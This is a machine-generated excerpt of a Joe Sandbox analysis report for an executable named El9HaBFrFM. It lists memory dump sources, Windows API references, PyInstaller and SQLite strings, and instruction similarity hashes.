                                                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,?,00007FF6BA3B4F11,?,?,?,?,00007FF6BA3BA48A,?,?,?,?,00007FF6BA3B718F), ref: 00007FF6BA3BB377
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 8fefcbba4d209cc5a194374eabcf6afe7ae299e3690268f17104ea0393047aa2
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 0c4e4368a6ac04a6a1af16ef9cc7cac7a12af766748610e59176326dbeec837e
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8fefcbba4d209cc5a194374eabcf6afe7ae299e3690268f17104ea0393047aa2
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6A112C20F0CE5282FA58AB6D965113D62439F84BB0F9447B4EF7EC76D6EE2CE8418700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007E13343010
                                                                                                                                                                                                                                                                                                                        • String ID: "%w" $%Q%s
                                                                                                                                                                                                                                                                                                                        • API String ID: 2142204133-1987291987
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 807366cecbe9e0301ba750eb4c07066faa31d7482fa8457f33c96b331545aa71
                                                                                                                                                                                                                                                                                                                        • Instruction ID: f671e69857532605f18261b6b9a722e6677316873901ea063ae87d02a3f7623d
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 807366cecbe9e0301ba750eb4c07066faa31d7482fa8457f33c96b331545aa71
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0EC1DF22B0AA8395EB14CB15E4A0A7967A4FB45BA8F449235DE7E477F8CF3CE444C300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007E13343010
                                                                                                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                                                                                        • API String ID: 2142204133-3727861699
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 0235fca2d0f175db58fc5e3e3c02f5a62c82d5e712601103777287498438dc37
                                                                                                                                                                                                                                                                                                                        • Instruction ID: eccdc27b8a4b265c9c387bd0d289337288d4b9b3859fbc6e61e5a473e0bbf354
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0235fca2d0f175db58fc5e3e3c02f5a62c82d5e712601103777287498438dc37
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35A12773B0E2D285D7248B1994A0ABE7F92FB81785F044236DBAA837D9DE3CE055D710
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007E13343010
                                                                                                                                                                                                                                                                                                                        • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                                                                                                                                                        • API String ID: 2142204133-2063813899
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 6f3502865f2554c3b22856db225aa2943b439a183bdfd32a53b0fa553fb1f819
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 35adcc33fad65c82aadbef9ac98b24261718a8aad9d9cedd5704d31b9fc77bf0
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f3502865f2554c3b22856db225aa2943b439a183bdfd32a53b0fa553fb1f819
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB91A1A3F0AB8682EB50CB11D420ABA77A5FB49B88F455235DE6D477EADF38D444C300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007E13343010
                                                                                                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                                                                                        • API String ID: 2142204133-3727861699
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3d911d27234210aac6b08763dd98c396f9c552569a20e5164efd14393bc372d3
                                                                                                                                                                                                                                                                                                                        • Instruction ID: d69f32acc4cba28de20126764065014e3801a3a0430501e13121f07a1fa256e6
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d911d27234210aac6b08763dd98c396f9c552569a20e5164efd14393bc372d3
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF81E036B0968286E7608F25D0A4BAE77A1FB4A7C4F048036EB5D477E9DF38D446D700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6BA3A1B6A), ref: 00007FF6BA3A295E
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                                                        • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                                                                                        • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                                                                                                        • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 6474216541e73cee04d5bea2235dbcdb92cf0d66e3b4a33291c267952bf03734
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C31D422B19B9552EB209B69E8406EA6396BF887D4F404136FF8DC3759EF7CD586C300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                                                                                                        • String ID: Unhandled exception in script
                                                                                                                                                                                                                                                                                                                        • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                                                                                                                                                                                                                                                        • Instruction ID: abcc867859b592937e0a5fb97efe447c81b924d8ac483f2989db55483e6c5155
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C315B32A19A9289EB20DF69E8552F96361FF88788F840175EF4DC7B59EF3CD1448700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF6BA3A918F,?,00007FF6BA3A3C55), ref: 00007FF6BA3A2BA0
                                                                                                                                                                                                                                                                                                                        • MessageBoxW.USER32 ref: 00007FF6BA3A2C2A
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                                                                                                        • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                                                                                                        • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 6bb14bf5cdbc8b869888d2abea2137adcdb3eb0d78b61a92b002b37a9e8c5c41
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2421AE62708B5182EB10DB69F8847EA73A5FB88780F404136EF8DD766AEE3CD245C740
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF6BA3A1B99), ref: 00007FF6BA3A2760
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                                                        • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                                                                                        • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                                                                                                        • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 650c7e43aba7845dd66f312a8e6f45dc3742a53488683232eb456c3364033eab
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F21A132A19B9182E720DB59F8807EA6394FB88380F400132FF8CC3659EF7CD1858740
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                                                        • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                                                                                                        • Instruction ID: bbe89f6377486ddb835e3b164c8dda79f18224af875dd38484ef08f2c7db0ed2
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7CF06D61B09B1691EA108F28E89577A6321FF897A1F940375DF6EC62E4EF2CD489C300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 1156100317-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 7aceca4c67f259a8ea055f5cda5efb5388b7b723a3c09b52805fce967372f75b
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA118F26E5CB2311FA64116EECB237D1250AF593A0E0706B4FF6ED63DAAF6CA9414300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • FlsGetValue.KERNEL32(?,?,?,00007FF6BA3BA5A3,?,?,00000000,00007FF6BA3BA83E,?,?,?,?,?,00007FF6BA3BA7CA), ref: 00007FF6BA3BB3AF
                                                                                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6BA3BA5A3,?,?,00000000,00007FF6BA3BA83E,?,?,?,?,?,00007FF6BA3BA7CA), ref: 00007FF6BA3BB3CE
                                                                                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6BA3BA5A3,?,?,00000000,00007FF6BA3BA83E,?,?,?,?,?,00007FF6BA3BA7CA), ref: 00007FF6BA3BB3F6
                                                                                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6BA3BA5A3,?,?,00000000,00007FF6BA3BA83E,?,?,?,?,?,00007FF6BA3BA7CA), ref: 00007FF6BA3BB407
                                                                                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6BA3BA5A3,?,?,00000000,00007FF6BA3BA83E,?,?,?,?,?,00007FF6BA3BA7CA), ref: 00007FF6BA3BB418
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: Value
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 4beba02b960c9f4c122fa6b087f84ea6fe2ade67e0ecd51c72e7f47762a48d3d
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5107153a3523f70bccd5f3a3d828954c4bae41eeb6ba1abaea3632cffcdc22a4
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4beba02b960c9f4c122fa6b087f84ea6fe2ade67e0ecd51c72e7f47762a48d3d
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30116320F0CE4281FA589B6D96512796143AF447B0FD853B4EF7DC66D6DE2CF8418300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
